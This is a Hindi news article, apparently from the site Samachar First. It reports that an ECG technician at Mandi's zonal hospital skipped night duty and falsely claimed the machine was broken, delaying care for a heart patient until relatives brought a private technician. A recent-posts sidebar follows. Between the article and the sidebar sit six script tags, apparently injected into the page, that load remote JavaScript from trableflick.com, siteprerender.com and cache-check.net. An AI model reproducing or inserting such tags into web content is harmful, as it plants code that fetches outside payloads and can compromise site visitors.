Categories: हिमाचल

मंडीः गंभीर हालत में मरीज को थी ECG की जरूरत, टेक्निशियन ने मशीन खराब का बना दिया बहाना

<p>जिला मंडी के जोनल अस्पताल में ईसीजी करने वाला टेक्निशियन रात को डयूटी से गायब था और बहाना मशीन खराब होने का बना दिया। मरीज को लेकर आए तीमारदारों को प्राईवेट ईसीजी टेक्निशियन को हाथ-पैर जोड़कर अस्पताल में लाकर ईसीजी करवानी पड़ी, जिसके बाद मरीज की गंभीर स्थिति को देखते हुए उसे शिमला रैफर कर दिया गया। बल्ह उपमंडल के बडसू गांव निवासी रवि कुमार और राजेंद्र कुमार ने बताया कि उनके चाचा जगदीश को रात को सीने में तेज दर्द हुआ। जगदीश कुमार का पहले भी हार्ट अटैक हो चुका था और एक स्टेंट भी पड़ा हुआ है।</p>

<p>जानकारी के अनुसार रात को जब दोनों भाई अपने अपने चाचा को जोनल अस्पताल मंडी लाए तो डॉक्टर ने तुरंत ईसीजी करने को कहा। दोनों भाई ईसीजी की तलाश में ईधर से उधर भागे और पता चला कि ईसीजी मशीन खराब है जिस कारण ईसीजी नहीं हो सकती। इसके बाद दोनों निजी टेक्निशियन के पास पहुंचे तो उन्होंने कोरोना का खौफ देखते हुए अस्पताल में जाने से इंकार कर दिया। निजी टेक्निशियन के हाथ-पैर जोड़कर और मिन्नतें करने के बाद वह अस्पताल आया और मरीज की ईसीजी की। ईसीजी में गड़बड़ी देखते ही ड्यूटी पर तैनात डॉक्टर ने बीना समय गंवाए मरीज को शिमला रैफर कर दिया।</p>

<p>जब इस बारे में डीसी मंडी ऋग्वेद ठाकुर से बात की गई और उन्होंने मामले की जांच पड़ताल की तो पाया कि रेडक्रास के माध्यम से अस्पताल में दो मशीनें उपलब्ध करवाई गई हैं और यह दोनों ही ठीक हैं। उन्होंने बताया कि रात को टेक्निशियन डयूटी से नदारद था मशीन खराब होने का झूठा बहाना बनाया गया था। इस संदर्भ में मामले की जांच के आदेश दे दिए हैं। बता दें कि जोनल अस्पताल मंडी में रेडक्रास के माध्यम से ईसीजी की सुविधा मुहैया करवाई जा रही है। यहां से आए दिन यही शिकायतें आ रही हैं कि ईसीजी की समय पर सुविधा नहीं मिलती। जांच पड़ताल करने पर यह भी पता चला है कि रेडक्रास रविवार और अन्य छुट्टी वाले दिन ईसीजी की सुविधा मुहैया नहीं करवा रही है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_907300090&amp;key=21aca573d498d25317&amp;cv=1596965536&amp;t=1596965535950″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_178115850&amp;key=21aca573d498d25317&amp;cv=780391&amp;t=1596965535950″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1596965535954″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: दिवाली बाद 2800 शिक्षकों की भर्ती प्रक्रिया होगी शुरू

2800 JBT TGT Recruitment: हिमाचल प्रदेश में दिवाली के बाद जेबीटी, टीजीटी और सीएंडवी शिक्षकों…

2 hours ago

विश्‍व में सादगी की मिसाल थे रतन टाटा, कभी नहीं रही दुनिया के अरबपतियों की सूची में आने की इच्छा

  एजेंसी/भाषा Ratan Tata Life: रतन टाटा भारत के सबसे प्रभावशाली उद्योगपतियों में से एक…

3 hours ago

नहीं रहे रतन टाटा, 86 वर्ष की आयु में हुआ निधन, देश में शोक

  Ratan Tata death:  भारत के सबसे सम्मानित उद्योगपतियों में से एक और टाटा संस…

3 hours ago

जानें कैसा रहेगा आपका आजका दिन

मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज का दिन आपके लिए…

3 hours ago

किन्नौर में 300 मीटर खाई में गिरा ट्रक, दो की मौके पर मौत

Kinnaur truck accident: किन्नौर ज़िले के निगुलसरी के पास एक  सड़क दुर्घटना में एक ईंटों…

15 hours ago

मस्जिद की 3 मंजिल गिराने के फैसले को न्यायालय में चुनौती की तैयारी

Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…

15 hours ago